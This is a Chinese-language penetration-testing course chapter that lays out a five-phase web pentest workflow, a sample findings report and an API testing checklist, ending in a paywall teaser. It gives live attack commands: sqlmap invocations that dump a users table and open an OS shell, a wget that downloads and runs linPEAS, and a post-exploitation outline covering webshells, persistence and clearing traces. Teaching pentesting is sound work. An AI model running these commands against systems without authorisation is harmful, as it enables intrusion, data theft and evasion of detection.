實戰:完整滲透測試

Vibe Prompt

「幫我規劃一次完整的 Web 滲透測試:從資訊收集、漏洞掃描、漏洞利用到取得 Shell。」

完整流程

第一階段:資訊收集 (1-2 天)
├── OSINT (域名、Email、子網域)
├── 技術棧識別
├── 埠掃描 (Nmap)
└── 目錄枚舉 (Gobuster, Dirb)

第二階段:漏洞掃描 (1-2 天)
├── Nessus / OpenVAS
├── OWASP ZAP
├── Nikto
└── Nuclei

第三階段:漏洞利用 (2-3 天)
├── SQL Injection (SQLMap)
├── XSS (手動驗證)
├── 檔案上傳繞過
├── SSRF
├── 不安全的直接物件引用 (IDOR)
└── 權限提升

第四階段:後滲透 (1 天)
├── Webshell 建立
├── 持久化
├── 橫向移動
├── 敏感資料收集
└── 清除痕跡

第五階段:報告 (1-2 天)
├── 漏洞摘要
├── 風險評級 (CVSS)
├── 修復建議
└── 附錄(Payload、截圖)

Nmap 全掃

# 完整掃描
nmap -sV -sC -O -A -p- -T4 target.com -oA report

# 參數
-sV: 版本偵測
-sC: 預設腳本
-O: OS 偵測
-A: 全面掃描
-p-: 所有埠 (1-65535)
-T4: 速度
-oA: 輸出所有格式

Gobuster 目錄枚舉

gobuster dir -u https://target.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt -t 50

gobuster vhost -u https://target.com -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -t 30

漏洞利用範例:SQLMap

# 自動化 SQL Injection
sqlmap -u "https://target.com/products?id=1" --batch --level=3 --risk=2

# 取得資料庫
sqlmap -u "https://target.com/products?id=1" --batch --dbs

# 取得表格
sqlmap -u "https://target.com/products?id=1" --batch -D mydb --tables

# 取得資料
sqlmap -u "https://target.com/products?id=1" --batch -D mydb -T users --dump

# OS Shell
sqlmap -u "https://target.com/products?id=1" --batch --os-shell

權限提升檢查

# Linux PE 腳本
wget https://raw.githubusercontent.com/carlospolop/PEASS-ng/master/linPEAS/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh

# 常見 PE 向量
sudo -l                    # sudo 權限
find / -perm -4000 2>/dev/null  # SUID 檔案
cat /etc/crontab           # 排程任務
uname -a                   # 核心版本
cat /etc/os-release        # 發行版

滲透測試報告範本

# 滲透測試報告

## 摘要
- 目標: https://vibe-tutor.com
- 週期: 2026-06-30 ~ 2026-07-02
- 發現漏洞: 7(高:2 中:3 低:2)
- CVSS 平均分數: 7.2

## 高風險漏洞

### H-01: SQL Injection in /api/products
- 描述: id 參數未過濾,可用 SQLMap 注入
- CVSS: 9.1 (Critical)
- 證據: sqlmap 成功 dump users 表格
- 修復: 使用參數化查詢

### H-02: Broken Access Control in /api/admin
- 描述: 未驗證管理員權限
- CVSS: 8.2 (High)
- 證據: 直接存取 /api/admin/users 回傳所有使用者
- 修復: 加入角色驗證 Middleware

## 中風險漏洞
... (略)

## 低風險漏洞
... (略)

課程總結

進階滲透測試完成!

  • ✅ Burp Suite
  • ✅ Metasploit
  • ✅ OSINT
  • ✅ Webshell 與持久化
  • ✅ 完整滲透測試流程


API 滲透測試:現代 SaaS 的核心攻擊面

越來越多的服務以 API 為主要介面——前端 App 打 API、第三方整合打 API、內部系統也打 API。API 已經取代傳統的 Web 頁面成為最主要的攻擊目標。

API 與 Web 滲透測試的差異

| 測試項目 | Web 滲透測試 | API 滲透測試 | |:--------|:-----------|:------------| | 目標 | HTML 頁面、表單 | JSON/XML 端點 | | 認證 | Cookie/Session | JWT/API Key/OAuth | | 參數 | GET/POST 表單 | JSON Body、Header | | 常見漏洞 | XSS、CSRF | IDOR、Mass Assignment | | 測試工具 | Burp Suite | Postman + Burp |

API 滲透測試檢查清單

  • [ ] 認證繞過:JWT 簽章驗證是否完整?
  • [ ] IDOR:修改 ID 能否存取別人的資料?
  • [ ] Rate Limit:是否有請求頻率限制?
  • [ ] Mass Assignment:能否傳入額外的 JSON 欄位?
  • [ ] Injection:參數是否經過消毒處理?
  • [ ] CORS:跨域設定是否過於寬鬆?

課程總結

這堂滲透測試課程你從偵察、OSINT、Burp Suite、漏洞開發、Web 漏洞、行動裝置測試到完整的 API 滲透測試——已經涵蓋了現代滲透測試的完整流程。

解鎖完整教學內容

本章為付費內容。加入專案即可解鎖超過 5000 字的深度解析,包含 10 個以上神級 Prompt 與真實 Source Code 範例!